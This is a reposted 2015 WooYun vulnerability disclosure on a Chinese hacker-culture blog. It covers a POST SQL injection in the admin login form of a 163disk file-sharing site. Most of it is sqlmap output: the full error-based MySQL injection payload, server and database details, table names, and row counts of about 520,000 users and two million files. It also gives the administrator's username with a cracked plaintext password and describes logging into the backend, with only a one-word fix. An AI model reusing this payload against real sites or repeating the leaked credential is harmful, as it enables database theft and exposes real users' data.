记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

163网盘某站post注入(泄露50万用户信息/200万用户文件)

2015-09-21 06:15

站点:http://admin.houtai.163disk.com/index.php

登陆框username参数存在注入

code 区域
sqlmap identified the following injection points with a total of 96 HTTP(s) requests:

---

Place: POST

Parameter: username

Type: error-based

Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause

Payload: username=admin' AND (SELECT 2388 FROM(SELECT COUNT(*),CONCAT(0x716e616271,(SELECT (CASE WHEN (2388=2388) THEN 1 ELSE 0 END)),0x7177656271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'MOFa'='MOFa&password=admin&seccode=xwvv&submit=%B5%C7 %C2%BC

---

web server operating system: Windows 2003 or XP

web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.17

back-end DBMS: MySQL 5.0

available databases [2]:

[*] 163diskcom

[*] information_schema



sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

---

Place: POST

Parameter: username

Type: error-based

Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause

Payload: username=admin' AND (SELECT 2388 FROM(SELECT COUNT(*),CONCAT(0x716e616271,(SELECT (CASE WHEN (2388=2388) THEN 1 ELSE 0 END)),0x7177656271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'MOFa'='MOFa&password=admin&seccode=xwvv&submit=%B5%C7 %C2%BC

---

web server operating system: Windows 2003 or XP

web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.17

back-end DBMS: MySQL 5.0

Database: 163diskcom

[21 tables]

+---------------------+

| disk_all_admin |

| disk_all_adminlog |

| disk_all_album |

| disk_all_badword |

| disk_all_config |

| disk_all_help |

| disk_all_hotso |

| disk_all_links |

| disk_all_list |

| disk_all_notice |

| disk_all_server |

| disk_all_smtp |

| disk_user_disk |

| disk_user_feedback |

| disk_user_file |

| disk_user_filebody |

| disk_user_filecount |

| disk_user_folder |

| disk_user_info |

| disk_user_login |

| disk_user_msg |

+---------------------+



Database: 163diskcom

+---------------------+---------+

| Table | Entries |

+---------------------+---------+

| disk_user_filecount | 2025746 |

| disk_user_filebody | 2025700 |

| disk_user_file | 2025639 | 文件表

| disk_user_disk | 522093 | 用户表

| disk_user_info | 522036 |

| disk_user_login | 144237 |

| disk_user_folder | 74119 |

| disk_user_msg | 71211 |

| disk_user_feedback | 16169 |

| disk_all_adminlog | 1549 |

| disk_all_badword | 1231 |

| disk_all_album | 136 |

| disk_all_links | 110 |

| disk_all_notice | 14 |

| disk_all_server | 10 |

| disk_all_hotso | 8 |

| disk_all_list | 8 |

| disk_all_smtp | 6 |

| disk_all_admin | 3 | 管理表

| disk_all_config | 1 |

+---------------------+---------+



1111.png



获取管理员wangming 解密wang_2014



登陆后台

2222.png



3333.png



4444.png

漏洞证明:

1111.png



2222.png



3333.png



4444.png

修复方案:

过滤


知识来源: www.wooyun.org/bugs/wooyun-2015-0130854

阅读:139263 | 评论:0 | 标签:注入

想收藏或者和大家分享这篇好文章→复制链接地址

“163网盘某站post注入(泄露50万用户信息/200万用户文件)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

❤人人都能成为掌握黑客技术的英雄❤

ADS

标签云